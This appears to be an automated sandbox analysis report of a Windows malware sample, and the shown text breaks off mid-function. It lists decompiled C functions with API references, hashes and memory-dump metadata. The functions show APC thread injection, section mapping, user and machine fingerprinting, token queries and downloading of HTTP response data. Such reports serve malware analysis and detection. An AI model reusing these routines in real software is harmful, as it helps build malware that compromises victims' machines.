Hagavete buyihexinag remibumepupabo gojokekisila, xrefs: 0042F3EF
mecevituxe, xrefs: 0042F7C5
ecucedidulola sedelalex zapexukigasu jihiwexogucup, xrefs: 0042F464

Memory Dump Source

Source File: 00000000.00000002.516842254.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID:
String ID: 2Y?$Dinilezu lacuke$Dumepof xumijaxovikik kemarep$Hagavete buyihexinag remibumepupabo gojokekisila$Hucet$Lebihukemihuw puzihicafiruzat dexewiyuvizafa soj gelaxubedi$Madesomaco diyoxilan xuw hihozexow$Petoco$Regefiri$Vefu mif kaxigija puhirege puwuf$Xegixaze$ecucedidulola sedelalex zapexukigasu jihiwexogucup$furafizasuyesipebokevocejirijan$geceyuhocavanino goruyitozekitapopit$iyeg xogahes yoxohavit jobikuz$mecevituxe$mikujukezicuharu$pemahu$xisilumibuvetufonahuvemugeli tewafuvapiwiyuzotuvu fatejevohivo$zetipabobutobawekicugi$zijiwe$\H
API String ID: 0-296773746
Opcode ID: 69f3cfee9f7e23a03a0476089b43a3e7bdb58674eb83ee48c19f64c0670b1dd3
Instruction ID: 0019451e6c706afbbbf5bf1942ac5e21078ec3ed6610180f6b2ca7fde844e7a8
Opcode Fuzzy Hash: 69f3cfee9f7e23a03a0476089b43a3e7bdb58674eb83ee48c19f64c0670b1dd3
Instruction Fuzzy Hash: 67626F71144348BFE3609BA1DE49F9B7BBCEB88745F00492DF74AE50A0DBB46444CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 004019A0, Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 140
threadsleepnativeCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E004019A0() {
				long _v8;
				long _v12;
				long _v16;
				void* _v40;
				void* __edi;
				long _t31;
				long _t33;
				long _t34;
				void* _t37;
				long _t40;
				long _t41;
				long _t45;
				void* _t48;
				struct _SECURITY_ATTRIBUTES* _t50;
				signed int _t54;
				signed int _t55;
				struct _SECURITY_ATTRIBUTES* _t59;
				long _t61;
				signed int _t62;
				void* _t66;
				void* _t69;
				signed int _t71;
				signed int _t72;
				void* _t75;
				intOrPtr* _t76;

				_t31 = E00401752();
				_t59 = 0;
				_v8 = _t31;
				if(_t31 != 0) {
					return _t31;
				}
				do {
					_t71 = 0;
					_v16 = _t59;
					_v12 = 0x30;
					do {
						_t66 = E004016EE(_v12);
						if(_t66 == _t59) {
							_v8 = 8;
						} else {
							_t54 = NtQuerySystemInformation(8, _t66, _v12,  &_v16); // executed
							_t62 = _t54;
							_t55 = _t54 & 0x0000ffff;
							_v8 = _t55;
							if(_t55 == 4) {
								_v12 = _v12 + 0x30;
							}
							_t72 = 0x13;
							_t15 = _t62 + 1; // 0x1
							_t71 =  *_t66 % _t72 + _t15;
							E004017CB(_t66);
						}
					} while (_v8 != _t59);
					_t33 = E004014AD(_t66, _t71); // executed
					_v8 = _t33;
					Sleep(_t71 << 4); // executed
					_t34 = _v8;
				} while (_t34 == 9);
				if(_t34 != _t59) {
					L28:
					return _t34;
				}
				if(E004017E0(_t62,  &_v12) != 0) {
					 *0x4030f8 = _t59;
					L18:
					_t37 = CreateThread(_t59, _t59, __imp__SleepEx,  *0x403100, _t59, _t59); // executed
					_t75 = _t37;
					if(_t75 == _t59) {
						L25:
						_v8 = GetLastError();
						L26:
						_t34 = _v8;
						if(_t34 == 0xffffffff) {
							_t34 = GetLastError();
						}
						goto L28;
					}
					_t40 = QueueUserAPC(E004013C4, _t75,  &_v40); // executed
					if(_t40 == 0) {
						_t45 = GetLastError();
						_v16 = _t45;
						TerminateThread(_t75, _t45);
						CloseHandle(_t75);
						_t75 = 0;
						SetLastError(_v16);
					}
					if(_t75 == 0) {
						goto L25;
					} else {
						_t41 = WaitForSingleObject(_t75, 0xffffffff);
						_v8 = _t41;
						if(_t41 == 0) {
							GetExitCodeThread(_t75,  &_v8);
						}
						CloseHandle(_t75);
						goto L26;
					}
				}
				_t76 = __imp__GetLongPathNameW;
				_t61 = _v12;
				_t48 =  *_t76(_t61, _t59, _t59); // executed
				_t69 = _t48;
				if(_t69 == 0) {
					L15:
					 *0x4030f8 = _t61;
					L16:
					_t59 = 0;
					goto L18;
				}
				_t23 = _t69 + 2; // 0x2
				_t50 = E004016EE(_t69 + _t23);
				 *0x4030f8 = _t50;
				if(_t50 == 0) {
					goto L15;
				}
				 *_t76(_t61, _t50, _t69); // executed
				E004017CB(_t61);
				goto L16;
			}

0x004019a7
0x004019ac
0x004019ae
0x004019b3
0x00401b1b
0x00401b1b
0x004019bb
0x004019bb
0x004019bd
0x004019c0
0x004019c7
0x004019cf
0x004019d3
0x00401a0d
0x004019d5
0x004019df
0x004019e5
0x004019e7
0x004019ec
0x004019f2
0x004019f4
0x004019f4
0x004019fc
0x00401a02
0x00401a02
0x00401a06
0x00401a06
0x00401a14
0x00401a1a
0x00401a23
0x00401a26
0x00401a2c
0x00401a2f
0x00401a36
0x00401b17
0x00000000
0x00401b18
0x00401a47
0x00401a87
0x00401a8d
0x00401a9d
0x00401aa3
0x00401aad
0x00401b08
0x00401b0a
0x00401b0d
0x00401b0d
0x00401b13
0x00401b15
0x00401b15
0x00000000
0x00401b13
0x00401ab9
0x00401ac7
0x00401ac9
0x00401acd
0x00401ad0
0x00401ad7
0x00401adc
0x00401ade
0x00401ade
0x00401ae6
0x00000000
0x00401ae8
0x00401aeb
0x00401af1
0x00401af6
0x00401afd
0x00401afd
0x00401b04
0x00000000
0x00401b04
0x00401ae6
0x00401a49
0x00401a51
0x00401a55
0x00401a57
0x00401a5b
0x00401a7d
0x00401a7d
0x00401a83
0x00401a83
0x00000000
0x00401a83
0x00401a5d
0x00401a62
0x00401a67
0x00401a6e
0x00000000
0x00000000
0x00401a73
0x00401a76
0x00000000

APIs

Part of subcall function 00401752: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,004019AC), ref: 00401761
Part of subcall function 00401752: GetVersion.KERNEL32 ref: 00401770
Part of subcall function 00401752: GetCurrentProcessId.KERNEL32 ref: 0040178C
Part of subcall function 00401752: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 004017A5

Part of subcall function 004016EE: HeapAlloc.KERNEL32(00000000,?,004019CF,00000030,?,00000000), ref: 004016FA

NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 004019DF
Sleep.KERNELBASE(00000000,00000000,00000030,?,00000000), ref: 00401A26
GetLongPathNameW.KERNELBASE(00000030,00000000,00000000), ref: 00401A55
GetLongPathNameW.KERNELBASE(00000030,00000000,00000000), ref: 00401A73
CreateThread.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000), ref: 00401A9D
QueueUserAPC.KERNELBASE(004013C4,00000000,?,?,00000000), ref: 00401AB9
GetLastError.KERNEL32(?,00000000), ref: 00401AC9
TerminateThread.KERNEL32(00000000,00000000,?,00000000), ref: 00401AD0
CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401AD7
SetLastError.KERNEL32(?,?,00000000), ref: 00401ADE
WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00401AEB
GetExitCodeThread.KERNEL32(00000000,00000008,?,00000000), ref: 00401AFD
CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401B04
GetLastError.KERNEL32(?,00000000), ref: 00401B08
GetLastError.KERNEL32(?,00000000), ref: 00401B15

Strings

0, xrefs: 004019F4

Memory Dump Source

Source File: 00000000.00000002.516786693.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.516802279.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.516809873.0000000000406000.00000040.00020000.sdmp Download File

Similarity

API ID: ErrorLast$Thread$CloseCreateHandleLongNamePathProcess$AllocCodeCurrentEventExitHeapInformationObjectOpenQueryQueueSingleSleepSystemTerminateUserVersionWait
String ID: 0
API String ID: 2806485730-4108050209
Opcode ID: 3788db5b3d14facb3acde25c59a1a62789e76d27affbce678ad3d56668680855
Instruction ID: 752d4060508721c6492002363c13e596e1a4780a18635d73c6680d1c48b3a507
Opcode Fuzzy Hash: 3788db5b3d14facb3acde25c59a1a62789e76d27affbce678ad3d56668680855
Instruction Fuzzy Hash: 5F417371D01215ABDB11AFE58D88D9F7ABCAF08314B10417BE601F32A0E7789E44CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00401E22, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401E22(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L00401F3A();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x403104;
				_push(_t15 + 0x40405e);
				_push(_t15 + 0x404054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L00401F34();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x403108, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x00401e22
0x00401e2b
0x00401e2f
0x00401e35
0x00401e3a
0x00401e3f
0x00401e42
0x00401e45
0x00401e4a
0x00401e4b
0x00401e4e
0x00401e59
0x00401e60
0x00401e64
0x00401e66
0x00401e67
0x00401e6a
0x00401e6f
0x00401e79
0x00401e7b
0x00401e7b
0x00401e8f
0x00401e95
0x00401e99
0x00401ee9
0x00401e9b
0x00401ea4
0x00401eba
0x00401ec2
0x00401ed4
0x00401ed8
0x00000000
0x00000000
0x00401ec4
0x00401ec7
0x00401ecc
0x00401ece
0x00401ece
0x00401eaf
0x00401eb1
0x00401eda
0x00401edb
0x00401edb
0x00401ea4
0x00401ef1

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,0040143D,0000000A,?,?), ref: 00401E2F
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00401E45
_snwprintf.NTDLL ref: 00401E6A
CreateFileMappingW.KERNELBASE(000000FF,00403108,00000004,00000000,?,?), ref: 00401E8F
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040143D,0000000A,?), ref: 00401EA6
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00401EBA
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040143D,0000000A,?), ref: 00401ED2
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0040143D,0000000A), ref: 00401EDB
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040143D,0000000A,?), ref: 00401EE3

Memory Dump Source

Source File: 00000000.00000002.516786693.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.516802279.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.516809873.0000000000406000.00000040.00020000.sdmp Download File

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1724014008-0
Opcode ID: fca7e80b9ba9561c9709ad2fe4079cad74267bb47c00cdbe9b3e782023aa4d13
Instruction ID: a99f727ced56dbd8a4c2c124101b8a7b9c2e615e3b488e27424ce2f1f10c42e7
Opcode Fuzzy Hash: fca7e80b9ba9561c9709ad2fe4079cad74267bb47c00cdbe9b3e782023aa4d13
Instruction Fuzzy Hash: 2521A1B2900209BFD711AFA4DD88EAF37A9EB48354F114036FB05F72E0D6749905CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 03C47A2E, Relevance: 12.1, APIs: 8, Instructions: 103
memoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E03C47A2E(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x3c4d270; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E03C44F97( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x3c4d2a4 ^ 0x46d76429;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x3c4d238, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E03C42C0D(_v8 + _v8, _t64);
							}
							HeapFree( *0x3c4d238, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x3c4d238, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E03C42C0D(_v8 + _v8, _t64);
						}
						HeapFree( *0x3c4d238, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}

0x03c47a2e
0x03c47a36
0x03c47a3a
0x03c47a3d
0x03c47a42
0x03c47a44
0x03c47a49
0x03c47a49
0x03c47a4f
0x03c47a51
0x03c47a5e
0x03c47abf
0x03c47a60
0x03c47a65
0x03c47a6b
0x03c47a70
0x03c47a7e
0x03c47a82
0x03c47a91
0x03c47a98
0x03c47a9f
0x03c47a9f
0x03c47aaa
0x03c47aaa
0x03c47a82
0x03c47a70
0x03c47ac1
0x03c47ac7
0x03c47ad1
0x03c47ad3
0x03c47ad8
0x03c47ae7
0x03c47aeb
0x03c47af6
0x03c47afd
0x03c47b04
0x03c47b04
0x03c47b10
0x03c47b10
0x03c47aeb
0x03c47b1b
0x03c47b1d
0x03c47b20
0x03c47b22
0x03c47b25
0x03c47b28
0x03c47b32
0x03c47b36
0x03c47b3a

APIs

GetUserNameW.ADVAPI32(00000000,?), ref: 03C47A65
RtlAllocateHeap.NTDLL(00000000,?), ref: 03C47A7C
GetUserNameW.ADVAPI32(00000000,?), ref: 03C47A89
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,03C430EE), ref: 03C47AAA
GetComputerNameW.KERNEL32(00000000,00000000), ref: 03C47AD1
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 03C47AE5
GetComputerNameW.KERNEL32(00000000,00000000), ref: 03C47AF2
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,03C430EE), ref: 03C47B10

Memory Dump Source

Source File: 00000000.00000002.517980109.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.517970784.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.517994997.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.518001499.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.518009139.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID:
API String ID: 3239747167-0
Opcode ID: f0b504c782afeb2443b6a20fa844bd2398f60c00792447d63e7de98c22893c16
Instruction ID: f737a6d35fb92f72919c174832cc974fbc3baf968c30601d1af8cfa83953b8fd
Opcode Fuzzy Hash: f0b504c782afeb2443b6a20fa844bd2398f60c00792447d63e7de98c22893c16
Instruction Fuzzy Hash: 2C311976A00205EFDB20EFA9DD85B6EFBF9FF48204B258469E515D7211EB31EE019B10

Uniqueness

Uniqueness Score: -1.00%

Function 03C49A0F, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E03C49A0F(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E03C41525(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E03C48B22(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}

0x03c49a1c
0x03c49a1d
0x03c49a1e
0x03c49a1f
0x03c49a20
0x03c49a24
0x03c49a2b
0x03c49a3a
0x03c49a3d
0x03c49a40
0x03c49a47
0x03c49a4a
0x03c49a4d
0x03c49a50
0x03c49a53
0x03c49a5e
0x03c49a60
0x03c49a69
0x03c49a71
0x03c49a73
0x03c49a85
0x03c49a8f
0x03c49a93
0x03c49aa2
0x03c49aa6
0x03c49aaf
0x03c49ab7
0x03c49ab7
0x03c49ab9
0x03c49ab9
0x03c49ac1
0x03c49ac7
0x03c49acb
0x03c49acb
0x03c49ad6

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 03C49A56
NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 03C49A69
NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 03C49A85

Part of subcall function 03C41525: RtlAllocateHeap.NTDLL(00000000,00000000,03C41278), ref: 03C41531

NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 03C49AA2
memcpy.NTDLL(00000000,00000000,0000001C), ref: 03C49AAF
NtClose.NTDLL(?), ref: 03C49AC1
NtClose.NTDLL(00000000), ref: 03C49ACB

Memory Dump Source

Source File: 00000000.00000002.517980109.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.517970784.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.517994997.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.518001499.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.518009139.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: d44ee49ed3d205e0d782b92485ee002b28bdc7b874af887896d4f8f7d2fc4c15
Instruction ID: 5171f2e37677e3d4fecd753a862daa84e0ba9f09aa75893181a3f49d37788567
Opcode Fuzzy Hash: d44ee49ed3d205e0d782b92485ee002b28bdc7b874af887896d4f8f7d2fc4c15
Instruction Fuzzy Hash: C221D8B6940228BFDB01EF95DC45EDEBFBDEF08750F108026FA05EA160D7719A449BA0

Uniqueness

Uniqueness Score: -1.00%

Function 03C45988, Relevance: 9.1, APIs: 6, Instructions: 124
filenetworkCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E03C45988(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void _v20;
				void* __esi;
				void* _t30;
				void* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				int _t45;
				void* _t54;
				long _t64;
				void* _t67;
				void* _t69;

				_t58 = __ecx;
				_t67 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t30 = _t67;
					_pop(_t68);
					_t69 = _t30;
					_t64 = 0;
					ResetEvent( *(_t69 + 0x1c));
					if(InternetReadFile( *(_t69 + 0x18),  &_v20, 4,  &_v8) != 0) {
						L9:
						if(_v8 == 0) {
							 *((intOrPtr*)(_t69 + 0x30)) = 0;
						} else {
							 *0x3c4d164(0, 1,  &_v12); // executed
							if(0 != 0) {
								_t64 = 8;
							} else {
								_t38 = E03C41525(0x1000);
								_v16 = _t38;
								if(_t38 == 0) {
									_t64 = 8;
								} else {
									_push(0);
									_push(_v8);
									_push( &_v20);
									while(1) {
										_t41 = _v12;
										_t61 =  *_t41;
										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
										ResetEvent( *(_t69 + 0x1c));
										_t45 = InternetReadFile( *(_t69 + 0x18), _v16, 0x1000,  &_v8); // executed
										if(_t45 != 0) {
											goto L17;
										}
										_t64 = GetLastError();
										if(_t64 == 0x3e5) {
											_t64 = E03C429C0( *(_t69 + 0x1c), _t61, 0xffffffff);
											if(_t64 == 0) {
												_t64 =  *((intOrPtr*)(_t69 + 0x28));
												if(_t64 == 0) {
													goto L17;
												}
											}
										}
										L19:
										E03C48B22(_v16);
										if(_t64 == 0) {
											_t64 = E03C448CB(_v12, _t69);
										}
										goto L22;
										L17:
										_t64 = 0;
										if(_v8 != 0) {
											_push(0);
											_push(_v8);
											_push(_v16);
											continue;
										}
										goto L19;
									}
								}
								L22:
								_t39 = _v12;
								 *((intOrPtr*)( *_t39 + 8))(_t39);
							}
						}
					} else {
						_t64 = GetLastError();
						if(_t64 != 0x3e5) {
							L8:
							if(_t64 == 0) {
								goto L9;
							}
						} else {
							_t64 = E03C429C0( *(_t69 + 0x1c), _t58, 0xffffffff);
							if(_t64 == 0) {
								_t64 =  *((intOrPtr*)(_t69 + 0x28));
								goto L8;
							}
						}
					}
					return _t64;
				} else {
					_t54 = E03C457DD(__ecx, __eax);
					if(_t54 != 0) {
						return _t54;
					} else {
						goto L2;
					}
				}
			}

0x03c45988
0x03c45989
0x03c4598f
0x03c4599a
0x03c4599a
0x03c4599c
0x03c4a556
0x03c4a55b
0x03c4a55d
0x03c4a574
0x03c4a5a5
0x03c4a5aa
0x03c4a66d
0x03c4a5b0
0x03c4a5b7
0x03c4a5bf
0x03c4a66a
0x03c4a5c5
0x03c4a5ca
0x03c4a5cf
0x03c4a5d4
0x03c4a65c
0x03c4a5da
0x03c4a5da
0x03c4a5dc
0x03c4a5e2
0x03c4a5e3
0x03c4a5e3
0x03c4a5e6
0x03c4a5e9
0x03c4a5ef
0x03c4a600
0x03c4a608
0x00000000
0x00000000
0x03c4a610
0x03c4a618
0x03c4a624
0x03c4a628
0x03c4a62a
0x03c4a62f
0x00000000
0x00000000
0x03c4a62f
0x03c4a628
0x03c4a641
0x03c4a644
0x03c4a64b
0x03c4a656
0x03c4a656
0x00000000
0x03c4a631
0x03c4a631
0x03c4a636
0x03c4a638
0x03c4a639
0x03c4a63c
0x00000000
0x03c4a63c
0x00000000
0x03c4a636
0x03c4a5e3
0x03c4a65d
0x03c4a65d
0x03c4a663
0x03c4a663
0x03c4a5bf
0x03c4a576
0x03c4a57c
0x03c4a584
0x03c4a59d
0x03c4a59f
0x00000000
0x00000000
0x03c4a586
0x03c4a590
0x03c4a594
0x03c4a59a
0x00000000
0x03c4a59a
0x03c4a594
0x03c4a584
0x03c4a676
0x03c45991
0x03c45991
0x03c45998
0x03c459a3
0x00000000
0x00000000
0x00000000
0x03c45998

APIs

ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,00000000,00000000,751881D0), ref: 03C4A55D
InternetReadFile.WININET(?,?,00000004,?), ref: 03C4A56C
GetLastError.KERNEL32(?,?,?,00000000,751881D0), ref: 03C4A576
ResetEvent.KERNEL32(?), ref: 03C4A5EF
InternetReadFile.WININET(?,?,00001000,?), ref: 03C4A600
GetLastError.KERNEL32 ref: 03C4A60A

Part of subcall function 03C457DD: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,751881D0), ref: 03C457F4
Part of subcall function 03C457DD: SetEvent.KERNEL32(?), ref: 03C45804
Part of subcall function 03C457DD: HttpQueryInfoA.WININET(?,20000013,?,?), ref: 03C45836
Part of subcall function 03C457DD: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 03C4585B
Part of subcall function 03C457DD: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 03C4587B

Memory Dump Source

Source File: 00000000.00000002.517980109.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.517970784.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.517994997.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.518001499.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.518009139.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: EventHttpInfoQuery$ErrorFileInternetLastReadReset$ObjectSingleWait
String ID:
API String ID: 2393427839-0
Opcode ID: de90881b58e00ce61a1d2c7ab094df7d88460360dc8dfbbce6e1b6168fb03dab
Instruction ID: e21c1acdfdb2c8ae8137beeb9848de60e81c4f9c6a8c72cfcbe5e54c2bcf96ca
Opcode Fuzzy Hash: de90881b58e00ce61a1d2c7ab094df7d88460360dc8dfbbce6e1b6168fb03dab
Instruction Fuzzy Hash: 8A41F53AA40600EFDF21EFA5DC44FAEB7BDAF84360F150568E552DB190EB30EA419B50

Uniqueness

Uniqueness Score: -1.00%

Function 00401C90, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00401C90(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E00401703(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}

0x00401c99
0x00401ca0
0x00401ca1
0x00401ca2
0x00401ca3
0x00401ca4
0x00401cb5
0x00401cb9
0x00401ccd
0x00401cd0
0x00401cd3
0x00401cda
0x00401cdd
0x00401ce4
0x00401ce7
0x00401cea
0x00401ced
0x00401cf2
0x00401d2d
0x00401cf4
0x00401cf7
0x00401cfd
0x00401d02
0x00401d06
0x00401d24
0x00401d08
0x00401d0f
0x00401d1d
0x00401d1d
0x00401d06
0x00401d35

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,75144EE0,00000000,00000000,?), ref: 00401CED

Part of subcall function 00401703: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00401D02,00000002,00000000,?,?,00000000,?,?,00401D02,00000002), ref: 00401730

memset.NTDLL ref: 00401D0F

Strings

@, xrefs: 00401CDD

Memory Dump Source

Source File: 00000000.00000002.516786693.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.516802279.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.516809873.0000000000406000.00000040.00020000.sdmp Download File

Similarity

API ID: Section$CreateViewmemset
String ID: @
API String ID: 2533685722-2766056989
Opcode ID: a0432050cf41c84421b6c7dc0a27d288bc4abc767ba214151e892c20fd89f3a1
Instruction ID: d00bf08d6aa1ecb95d0b181047dcd8cf727594324f693dbf64d6d2eb4fe127ad
Opcode Fuzzy Hash: a0432050cf41c84421b6c7dc0a27d288bc4abc767ba214151e892c20fd89f3a1
Instruction Fuzzy Hash: E521F9B5D0020DAFDB11DFA9C8849DEFBB9EF48354F10843AE615F3250D734AA458B64

Uniqueness

Uniqueness Score: -1.00%

Function 00401264, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401264(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
